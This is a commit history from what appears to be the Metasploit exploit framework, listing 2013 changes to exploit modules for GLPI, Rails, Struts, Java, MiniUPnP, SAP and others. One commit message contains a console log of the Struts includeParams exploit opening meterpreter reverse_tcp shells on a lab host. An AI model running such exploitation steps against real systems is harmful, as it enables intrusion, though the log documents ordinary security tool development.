Commit Graph

1370 Commits (b55f425ec0d332796edf9df2f0b133d9c38fcb22)

Author SHA1 Message Date
Tod Beardsley 93486a627d Whoops on trailing commas 2013-09-24 15:14:11 -05:00
Tod Beardsley 3906d4a2ca Fix caps that throw msftidy warnings 2013-09-24 13:03:16 -05:00
Tod Beardsley c547e84fa7 Prefer Ruby style for single word collections
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.

This change converts all Payloads to this format if there is more than
one payload to choose from.

It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.

See:
  https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00
Tod Beardsley 4bff8f2cdc Update descriptions for clarity. 2013-09-23 13:48:23 -05:00
Joe Vennix a08d195308 Add Node.js as a platform.
* Fix some whitespace issues in platform.rb
2013-09-20 18:14:01 -05:00
Joe Vennix 49f15fbea4 Removes PayloadType from exploit module. 2013-09-20 18:01:55 -05:00
jvazquez-r7 29649b9a04 Land #2388, @dummys's exploit for CVE-2013-5696 2013-09-20 13:03:01 -05:00
jvazquez-r7 8922d0fc7f Fix small bugs on glpi_install_rce 2013-09-20 13:01:41 -05:00
jvazquez-r7 b24ae6e80c Clean glpi_install_rce 2013-09-20 12:58:23 -05:00
dummys 032b9115a0 removed the old exploit 2013-09-20 10:53:52 +02:00
dummys 187ab16467 many change in the code and replace at the correct place the module 2013-09-20 10:45:10 +02:00
sinn3r 8d70a9d893 Add more refs 2013-09-19 22:05:23 -05:00
Joe Vennix 137b3bc6ea Fix whitespace issues. 2013-09-19 17:29:11 -05:00
Joe Vennix bd96c6c093 Adds module for CVE-2013-3568. 2013-09-19 17:26:30 -05:00
dummys 08c7b49be0 corrected too much if 2013-09-19 21:47:01 +02:00
dummys 862a8fb8aa corrected indentation bug again 2013-09-19 20:27:23 +02:00
dummys ce8e94b5fe corrected indentation bug 2013-09-19 20:14:07 +02:00
dummys f9617e351d corrected Integer() 2013-09-19 16:04:20 +02:00
dummys bc57c9c6ec corrected some codes requested by Meatballs 2013-09-18 17:55:36 +02:00
dummys 3366c3aa77 CVE-2013-5696 RCE for GLPI 2013-09-18 16:11:32 +02:00
Joe Vennix 5fc724bced Kill explanatory comment. 2013-09-16 21:34:38 -05:00
Joe Vennix 2c47e56d90 Adds module for yaml code exec. 2013-09-16 21:33:57 -05:00
Joe Vennix e1e1cab797 Module gets me a shell, yay 2013-09-16 13:37:16 -05:00
Tab Assassin 41e4375e43 Retab modules 2013-08-30 16:28:54 -05:00
Vlatko Kosturjak b702a0d353 Fix "A payload has not been selected."
Since platform definition is missing, exploitation fails.
2013-08-28 12:53:08 +02:00
Tod Beardsley ca313806ae Trivial grammar and word choice fixes for modules 2013-08-19 13:24:42 -05:00
Steve Tornio 0037ccceed add osvdb ref for openx backdoor 2013-08-18 06:34:50 -05:00
jvazquez-r7 1a3b4eebdb Fix directory name on ruby 2013-08-15 22:54:31 -05:00
jvazquez-r7 795ad70eab Change directory names 2013-08-15 22:52:42 -05:00
jvazquez-r7 c5c2aebf15 Update references 2013-08-15 22:04:15 -05:00
jvazquez-r7 cc5804f5f3 Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00
sinn3r 462ccc3d36 Missed these little devils 2013-08-15 16:50:13 -05:00
HD Moore 6c1ba9c9c9 Switch to Failure vs Exploit::Failure 2013-08-15 14:14:46 -05:00
Tod Beardsley 6c0b067d7c Land #2163, known secret session cookie for RoR
From @joernchen, leverages an infoleak to gain a shell on rails
applications. There is no patch, since you are expected to keep your
secrets, well, secret.
2013-08-09 12:30:37 -05:00
Tod Beardsley 969b380d71 More explicit title, grammar check on description 2013-08-09 12:27:45 -05:00
Tod Beardsley 13ea8aaaad VALIDATE_COOKIE better grammar on fail message 2013-08-09 12:26:12 -05:00
Tod Beardsley 94e7164b01 Allow user to choose to validate the cookie or not 2013-08-09 12:22:28 -05:00
joernchen of Phenoelit 376c37d4cc Two more fixes, Arch and unneeded include. 2013-08-09 09:23:50 +02:00
Tod Beardsley 155c121cbb More spacing between ends 2013-08-08 16:35:38 -05:00
Tod Beardsley f4fc0ef3fb Moved classes into the Metasploit3 space
I'm just worried about all those naked classes just hanging around in
the top namespace. This shouldn't impact functionality at all.

While most modules don't define their own classes (this is usually the
job of Msf::Exploit and Rex), I can't think of a reason why you
shouldn't (well, aside from reusability). And yet, very rarely do
modules do it. It's not unknown, though -- the drda.rb capture module
defines a bunch of Constants, and the
post/windows/gather/credentials/bulletproof_ftp.rb module defines some
more interesting things.

So, this should be okay, as long as things are defined in the context of
the Metasploit module proper.
2013-08-08 16:22:34 -05:00
Tod Beardsley 4e166f3da4 Adding more blank lines between methods
For readability
2013-08-08 16:20:38 -05:00
jvazquez-r7 4a609504e3 Land #2199, @jlee-r7's exploit for CVE-2013-4211 2013-08-08 14:57:28 -05:00
sinn3r a03d71d60e Land #2181 - More targets for hp_sys_mgmt_exec
Thanks mwulftange!
2013-08-08 13:35:33 -05:00
sinn3r a73f87eaa5 No autodetect. Allow the user to manually select. 2013-08-08 13:34:25 -05:00
James Lee 080ca0b1b1 Use fail_with when failing instead of print_error 2013-08-08 13:12:39 -05:00
James Lee ca7c0defe1 No need to rescue if we're just re-raising 2013-08-07 17:36:07 -05:00
James Lee c808930f15 Add module for CVE-2013-4211, openx backdoor 2013-08-07 17:24:47 -05:00
HD Moore c73e417531 Merge pull request #2171 from frederic/master
add new target in libupnp_ssdp_overflow exploit : Axis Camera M1011
2013-08-05 18:31:41 -07:00
Tod Beardsley e7206af5b5 OSVDB and comment doc fixes 2013-08-05 09:08:17 -05:00
Markus Wulftange 9955899d9a Minor formal fixes 2013-08-04 08:03:02 +02:00
Markus Wulftange 8cc07cc571 Merge Linux and Windows exploit in multi platform exploit 2013-08-02 18:49:03 +02:00
Frederic Basse 5e1def26aa remove Axis M1011 fingerprint, may not be specific enough to be used automatically. 2013-07-30 09:54:33 +02:00
Tod Beardsley 7e539332db Reverting disaster merge to 593363c5f with diff
There was a disaster of a merge at 6f37cf22eb that is particularly
difficult to untangle (it was a bad merge from a long-running local
branch).

What this commit does is simulate a hard reset, by doing thing:

 git checkout -b reset-hard-ohmu
 git reset --hard 593363c5f9
 git checkout upstream-master
 git checkout -b revert-via-diff
 git diff --no-prefix upstream-master..reset-hard-ohmy > patch
 patch -p0 < patch

Since there was one binary change, also did this:

 git checkout upstream-master data/exploits/CVE-2012-1535/Main.swf

Now we have one commit that puts everything back. It screws up
file-level history a little, but it's at least at a point where we can
move on with our lives. Sorry.
2013-07-29 21:47:52 -05:00
Frederic Basse 63940d438e add new target in libupnp_ssdp_overflow exploit : Axis Camera M1011 2013-07-30 01:56:10 +02:00
joernchen of Phenoelit ac28dbe734 Minor typo fix 2013-07-28 19:44:44 +02:00
joernchen of Phenoelit 8cdd163150 Module polishing, thanks @todb-r7.
Two test-apps (Rails 3/4) are available for this module. Ping me if you want to use them.
2013-07-28 13:52:27 +02:00
joernchen of Phenoelit 7f3eccd644 Rails 3/4 RCE w/ token 2013-07-26 20:23:18 +02:00
jvazquez-r7 5014919198 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-25 09:02:20 -05:00
jvazquez-r7 7641aa3e63 Delete stop_service calls 2013-07-24 16:35:15 -05:00
jvazquez-r7 8dd7a664b4 Give a chance to FileDropper too 2013-07-24 08:57:43 -05:00
jvazquez-r7 04b9e3a3e6 Add module for CVE-2013-2251 2013-07-24 08:52:02 -05:00
jvazquez-r7 458ac5f289 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-17 15:02:33 -05:00
jvazquez-r7 73fd14a500 Fix [SeeRM #8239] NoMethodError undefined method 2013-07-16 15:59:52 -05:00
jvazquez-r7 c4485b127c Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-04 19:43:38 -05:00
jvazquez-r7 8772cfa998 Add support for PLESK on php_cgi_arg_injection 2013-07-04 08:24:25 -05:00
jvazquez-r7 db00599d44 Move carberp_backdoor_exec to unix webapp exploits foler 2013-06-30 10:00:14 -05:00
Brian Wallace d990c7f21f Dat line 2013-06-29 09:46:36 -07:00
Brian Wallace ec7c9b039a Further refactoring requested 2013-06-29 09:45:22 -07:00
Brian Wallace 8542342ff6 Merge branch 'carberp_backdoor_exec' of git@github.com:bwall/metasploit-framework.git into carberp_backdoor_exec 2013-06-28 22:45:03 -07:00
Brian Wallace b8cada9ab0 Applied some refactoring to decrease line count 2013-06-28 22:44:23 -07:00
(B)rian (Wall)ace 9486364cc4 Added Steven K's email 2013-06-28 15:31:17 -07:00
Brian Wallace fe0e16183c Carberp backdoor eval PoC 2013-06-28 14:47:13 -07:00
jvazquez-r7 3c1af8217b Land #2011, @matthiaskaiser's exploit for cve-2013-2460 2013-06-26 14:35:22 -05:00
jvazquez-r7 81a2d9d1d5 Merge branch 'module_java_jre17_provider_skeleton' of https://github.com/matthiaskaiser/metasploit-framework 2013-06-26 14:32:59 -05:00
jvazquez-r7 4fa789791d Explain Ranking 2013-06-25 13:10:15 -05:00
jvazquez-r7 127300c62d Fix also ruby module 2013-06-25 12:59:42 -05:00
jvazquez-r7 0c306260be Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-25 09:13:01 -05:00
sinn3r 4df943d1a2 CVE and OSVDB update 2013-06-25 02:06:20 -05:00
jvazquez-r7 e9fccb8dbd Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-24 22:07:48 -05:00
HD Moore 24b7d19ecc Fix target regex and wfsdelay 2013-06-24 14:56:43 -05:00
jvazquez-r7 98fddb6ce1 up to date 2013-06-24 11:57:11 -05:00
jvazquez-r7 f7650a4b18 Fix wrong local variable 2013-06-24 11:35:26 -05:00
Matthias Kaiser 8a96b7f9f2 added Java7u21 RCE module
Click2Play bypass doesn't seem to work anymore.
2013-06-24 02:04:38 -04:00
jvazquez-r7 785639148c Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-20 17:18:42 -05:00
William Vu 4cc1f2440d Land #1996, references for several modules 2013-06-20 11:32:55 -05:00
Steve Tornio 322ba27f0f re-order refs 2013-06-20 11:17:23 -05:00
William Vu 22026352e6 Land #1995, OSVDB reference for Gitorious 2013-06-20 10:51:51 -05:00
Steve Tornio 66f4424202 fix formatting 2013-06-20 10:41:14 -05:00
Steve Tornio a3a5dec369 add osvdb ref 94441 2013-06-20 08:03:34 -05:00
Steve Tornio a824a0583e add osvdb ref 89059 2013-06-20 07:34:15 -05:00
Steve Tornio 89f649ab99 add osvdb ref 89026 2013-06-20 07:28:29 -05:00
Steve Tornio 2b55e0e0a6 add osvdb ref 64171 2013-06-20 07:17:22 -05:00
Steve Tornio d19bd7a905 add osvdb 85739, cve 2012-5159, edb 21834 2013-06-20 07:01:59 -05:00
Steve Tornio 6cc7d9ccae add osvdb ref 85446 and edb ref 20500 2013-06-20 06:54:06 -05:00
Steve Tornio ee21120c04 add osvdb ref 85509 2013-06-20 06:47:10 -05:00
Steve Tornio ade970afb8 add osvdb ref 89322 2013-06-20 06:44:22 -05:00
Steve Tornio 42690a5c48 add osvdb ref 77492 2013-06-20 06:38:47 -05:00
Steve Tornio 0dca5ede7e add osvdb ref 78480 2013-06-20 06:07:08 -05:00
Steve Tornio 29bc169507 add osvdb ref 64171 2013-06-20 06:00:05 -05:00
jvazquez-r7 869438cb73 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-19 19:57:40 -05:00
James Lee 81b4efcdb8 Fix requires for PhpEXE
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
jvazquez-r7 fd397db6e0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-18 14:09:33 -05:00
sinn3r b514124997 Land #1979 - OSVDB update 2013-06-18 10:42:09 -05:00
sinn3r fbd16a2f3e Land #1978 - OSVDB update 2013-06-18 10:41:33 -05:00
sinn3r 1e46f7df48 Land #1977 - OSVDB update 2013-06-18 10:40:55 -05:00
Steve Tornio e278ac5061 add osvdb ref 91841 2013-06-18 06:41:30 -05:00
Steve Tornio 404a9f0669 add osvdb ref 89594 2013-06-18 06:25:57 -05:00
Steve Tornio 27158d89c7 add osvdb ref 89105 2013-06-18 06:15:29 -05:00
Steve Tornio 2afc90a8de fix typos 2013-06-18 06:05:45 -05:00
Steve Tornio 2c3181b56b add osvdb ref 90627 2013-06-18 05:59:39 -05:00
jvazquez-r7 de1561363e Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-17 16:43:33 -05:00
William Vu b51349ed77 Land #1968, OSVDB reference for ManageEngine 2013-06-17 10:30:05 -05:00
jvazquez-r7 8fac0aaf6b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-17 08:24:39 -05:00
Steve Tornio e37a0b871f add osvdb ref 86562 2013-06-17 06:04:54 -05:00
Steve Tornio 6e57ecab59 add osvdb ref 79246 and edb ref 18492 2013-06-17 05:58:00 -05:00
Steve Tornio e17ccdda3a add osvdb ref 68662 2013-06-16 18:11:13 -05:00
jvazquez-r7 11bf17b0d6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-15 11:55:22 -05:00
William Vu 0cf2751ec1 Land #1965, OSVDB reference for pBot 2013-06-15 07:39:25 -05:00
Steve Tornio d35dd73328 add osvdb ref 84913 2013-06-15 07:30:23 -05:00
William Vu 638175a6be Land #1964, OSVDB reference for StorageWorks 2013-06-15 07:27:43 -05:00
Steve Tornio 0c6157694f add osvdb ref 82087 2013-06-15 07:22:32 -05:00
Steve Tornio 6e8b844954 add osvdb ref 89611 2013-06-15 07:12:44 -05:00
Steve Tornio 63483a979d add osvdb ref 89611 2013-06-15 07:09:26 -05:00
jvazquez-r7 0b9cf213df Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-12 12:03:10 -05:00
Joe Vennix 45da645717 Update ff svg exploit description to be more accurate. 2013-06-11 12:12:18 -05:00
jvazquez-r7 b20a38add4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-10 12:22:52 -05:00
Tod Beardsley f58e279066 Cleanup on module names, descriptions. 2013-06-10 10:52:22 -05:00
jvazquez-r7 9d0047ff74 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-07 16:44:52 -05:00
jvazquez-r7 79bfdf3ca6 Add comment to explain the applet delivery methods 2013-06-07 14:20:21 -05:00
jvazquez-r7 641fd3c6ce Add also the msf module 2013-06-07 13:39:19 -05:00
jvazquez-r7 6497e5c7a1 Move exploit under the linux tree 2013-06-04 08:53:18 -05:00
jvazquez-r7 0bf2f51622 Land #1843, @viris exploit for CVE-2013-0230 2013-06-04 08:52:09 -05:00
jvazquez-r7 86c768ad02 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-04 08:15:28 -05:00
Dejan Lukan 8ced3483de Deleted some undeeded comments and used the text_rand function rather than static values. 2013-06-04 08:44:47 +02:00
sinn3r ad87065b9a Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb 2013-06-04 01:35:13 -05:00
Ruslaideemin 71bc06d576 Fix undefined variable in tomcat_mgr_deploy.rb
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯in `call'
lib/msf/core/thread_manager.rb💯in `block in spawn'

Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
jvazquez-r7 4079484968 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-03 15:27:36 -05:00
Tod Beardsley 4cf682691c New module title and description fixes 2013-06-03 14:40:38 -05:00
Dejan Lukan df20e79375 Deleted the handle because it's not required and check() function. 2013-06-03 10:18:43 +02:00
Dejan Lukan 36f275d71a Changed the send_request_raw into send_request_cgi function. 2013-06-03 10:06:24 +02:00
Dejan Lukan 675fbb3045 Deleted the DoS UPnP modules, because they are not relevant to the current branch. 2013-06-03 09:45:29 +02:00
Dejan Lukan 1ceed1e44a Added corrected MiniUPnP module. 2013-06-03 09:37:04 +02:00
Dejan Lukan d656360c24 Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability 2013-06-03 09:37:03 +02:00
Dejan Lukan 39e4573d86 Added CVE-2013-0229 for MiniUPnPd < 1.4 2013-06-03 09:37:03 +02:00
jvazquez-r7 f68d35f251 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-01 17:09:23 -05:00
Steve Tornio 80f1e98952 added osvdb refs 2013-06-01 07:04:43 -05:00
jvazquez-r7 48b14c09e3 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 01:12:46 -05:00
jvazquez-r7 146a30ec4d Do minor cleanup for struts_include_params 2013-05-31 01:01:15 -05:00
jvazquez-r7 a7a754ae1f Land #1870, @Console exploit for Struts includeParams injection 2013-05-31 00:59:33 -05:00
Console eb4162d41b boolean issue fix 2013-05-30 18:15:33 +01:00
Console 5fa8ecd334 removed magic number 109
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Console 47524a0570 converted request params to hash merge operation 2013-05-30 15:36:01 +01:00
Console 51879ab9c7 removed unnecessary lines 2013-05-30 15:15:10 +01:00
Console abb0ab12f6 Fix msftidy compliance 2013-05-30 13:10:24 +01:00
Console 5233ac4cbd Progress bar instead of message spam. 2013-05-30 13:08:43 +01:00
Console fb388c6463 Chunk length is now "huge" for POST method
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console ab6a2a049b Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console d70526f4cc Renamed as per suggestion 2013-05-30 09:29:26 +01:00
Console 7c38324b76 Considered using the bourne stager.
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Console ec315ad50d Modified URI handling to make use of target_uri and vars_get/post.
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
Console b39531cea6 Added references 2013-05-28 23:15:10 +01:00
jvazquez-r7 66ea59b03f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-28 15:22:46 -05:00
Console 7b43117d87 Added RCE for Struts versions earlier than 2.3.14.2
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee 9843dc4cb4 Land #1708, android meterpreter
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
Tod Beardsley 75d6c8079a Spelling, whitespace
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
jvazquez-r7 d5cf6c1fbc Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-23 12:37:54 -05:00
sinn3r 81ad280107 Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
sinn3r 67861794f6 Fix automatic payload selection 2013-05-22 22:37:18 -05:00
sinn3r 23fe3146dc Extra print_status I don't want 2013-05-22 14:38:30 -05:00
sinn3r 0e6576747a Fix target selection probs, and swf path 2013-05-22 14:34:00 -05:00
jvazquez-r7 0dee5ae94d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-22 12:54:44 -05:00
Joe Vennix aae4768563 Fix whitespace issues from msftidy. 2013-05-21 14:31:36 -05:00
Joe Vennix eaeb10742a Add some comments and clean some things up. 2013-05-21 14:01:14 -05:00
Joe Vennix 978aafcb16 Add DEBUG option, pass args to .encoded_exe(). 2013-05-21 14:01:14 -05:00
Joe Vennix ee8a97419c Add some debug print calls to investigate Auto platform selection. 2013-05-21 14:01:13 -05:00
Joe Vennix 60fdf48535 Use renegerate_payload(cli, ...). 2013-05-21 14:01:13 -05:00
James Lee f4498c3916 Remove $Id tags
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
jvazquez-r7 0f3b13e21d up to date 2013-05-16 15:02:41 -05:00
James Lee 3009bdb57e Add a few more references for those without 2013-05-16 14:32:02 -05:00
h0ng10 378f0fff5b added missing comma 2013-05-16 18:59:46 +02:00
Joe Vennix 1a5c747bb9 Update description. 2013-05-15 23:52:51 -05:00
Joe Vennix 178a43a772 Whitespace tweaks and minor bug fix. Wrong payloads still run. 2013-05-15 23:47:04 -05:00
Joe Vennix f4b6db8c49 Tweak whitespace. 2013-05-15 23:35:59 -05:00
Joe Vennix a7d79e2a51 Oops, don't cache payload_filename. 2013-05-15 23:34:14 -05:00
Joe Vennix 4d5c4f68cb Initial commit, works on three OSes, but automatic mode fails. 2013-05-15 23:32:02 -05:00
jvazquez-r7 cb24d3ddae Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-15 11:13:29 -05:00
James Lee 61afe1449e Landing #1275, bash cmdstager
Conflicts:
	lib/rex/exploitation/cmdstager.rb

Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
jvazquez-r7 352a7afcd6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 22:29:24 -05:00
sinn3r 41e9f35f3f Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform 2013-05-14 14:48:16 -05:00
jvazquez-r7 b9caa23b30 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 12:26:23 -05:00
Tod Beardsley e3384439ed 64-bit, not '64 bits' 2013-05-13 15:40:17 -05:00
jvazquez-r7 495f1e5013 Add multi platform module for SAP MC exec exploit 2013-05-12 08:46:00 -05:00
jvazquez-r7 891e36c947 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-09 17:47:35 -05:00
jvazquez-r7 4147a27216 Land #1667, @nmonkee's sap_soap_rfc_sxpg_command_exec exploit 2013-05-09 17:00:11 -05:00
jvazquez-r7 6842432abb Land #1678, @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit 2013-05-09 16:52:01 -05:00
jvazquez-r7 e939de583c Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec 2013-05-07 22:46:39 -05:00
jvazquez-r7 5f59d9f723 Move sap_soap_rfc_sxpg_command_exec to multi dir 2013-05-07 22:46:04 -05:00
jvazquez-r7 ab60e0bfb7 Fix print message 2013-05-07 22:41:15 -05:00
jvazquez-r7 24bad9c15c Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform 2013-05-07 17:03:10 -05:00
jvazquez-r7 76f6d9f130 Move module to multi-platform location 2013-05-07 17:01:56 -05:00
jvazquez-r7 a4632b773a Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-28 12:59:16 -05:00
sinn3r 1d9a695d2b Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
[Closes #1772]
2013-04-28 12:17:16 -05:00
Meatballs ccb630eca2 Whitespace and change default user 2013-04-27 10:39:27 +01:00
Meatballs 209188bc22 Add refs and use targeturi 2013-04-27 10:35:49 +01:00
Meatballs 3ac041386b Add php version to check 2013-04-26 23:59:49 +01:00
Meatballs e25fdebd8d Add php version to check 2013-04-26 23:58:08 +01:00
Meatballs cd842df3e2 Correct phpMyAdmin 2013-04-26 23:38:27 +01:00
Meatballs 6bb2af7cee Add pma url 2013-04-26 23:37:26 +01:00
James Lee a0c1b6d1ce Clear out PMA's error handler
* Add an error_handler function that just returns true. This prevents eventual
  ENOMEM errors and segfaults like these:
    [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
    [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
2013-04-26 15:25:09 -05:00
Meatballs 1f2cab7aef Tidyup and getcookies 2013-04-26 20:26:04 +01:00
Meatballs 0901d00da5 Remove redundant pay opts 2013-04-26 19:26:29 +01:00
Meatballs a17d61897d Change to send_rq_cgi 2013-04-26 19:19:11 +01:00
Meatballs 54233e9fba Better entropy 2013-04-26 17:46:43 +01:00
Meatballs c8da13cfa0 Add some entropy in request 2013-04-26 17:34:17 +01:00
Meatballs a043d3b456 Fix auth check and cookie handling 2013-04-26 17:10:24 +01:00
Meatballs 025315e4e4 Move to http 2013-04-26 15:42:26 +01:00
Meatballs 9ad19ed2bf Final tidyup 2013-04-26 15:41:28 +01:00
Meatballs c7ac647e4e Initial attempt lfi 2013-04-26 14:32:18 +01:00
jvazquez-r7 2a41422276 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-25 20:24:17 -05:00
jvazquez-r7 bf0375f0e9 Fix @jlee-r7's feedback 2013-04-25 18:43:21 -05:00
jvazquez-r7 8eea476cb8 Build the jnlp uri when resource is available 2013-04-25 18:43:21 -05:00
jvazquez-r7 cc961977a2 Add bypass for click2play 2013-04-25 18:43:21 -05:00
jvazquez-r7 1761b1ad7b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-23 17:35:35 -05:00
jvazquez-r7 ece36c0610 Update references for the las Java exploit 2013-04-22 21:55:04 -05:00
jvazquez-r7 b6365db0b5 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-22 09:38:32 -05:00
jvazquez-r7 1365dfe68c Add Oracle url 2013-04-20 01:43:14 -05:00
jvazquez-r7 b99fc06b6f description updated 2013-04-20 01:43:14 -05:00
jvazquez-r7 19f2e72dbb Added module for Java 7u17 sandboxy bypass 2013-04-20 01:43:13 -05:00
jvazquez-r7 bbf7cc4394 up to date 2013-04-17 11:54:12 -05:00
jvazquez-r7 48def7dbdb up to date 2013-04-17 06:36:44 -05:00
Jon Hart 83ec9757ec Addressed feedback from PR#1717 2013-04-16 19:00:26 -07:00
jvazquez-r7 cc35591723 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-15 17:43:15 -05:00
Tod Beardsley 873bdbab57 Removing APSB13-03, not ready.
This was landed by @todb-r7 on #1709 but that was premature. #1717 was
a proposed set of fixes, but it didn't go far enough.

@jhart-r7 and @jvazquez-r7 should revisit this module for sure, there's
some good stuff in there, but it's not ready for a real release quite
yet. Take a look at the issues discussed in those PRs and open a new PR
with a new module?

Sorry for the switcheroo, not trying to be a jerk.

[Closes #1717]
2013-04-15 13:36:47 -05:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
jvazquez-r7 2ab7552a85 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-10 09:11:41 +02:00
Tod Beardsley 0d2746fb4c defs should have parens when taking args
While it's allowed in ruby to drop most parens, many are useful for
readability.

Also adds a missing CVE.
2013-04-09 17:57:52 -05:00
Tod Beardsley 90e986860e Adding most suggested changes to jhart's adobe module 2013-04-09 17:55:28 -05:00
Jon Hart 8a98b1af4a Added command mode, plus fixed the dropping of payloads 2013-04-07 15:39:38 -07:00
Jon Hart f482496795 Initial commit of an exploit module for the CVEs covered by APSB13-03.
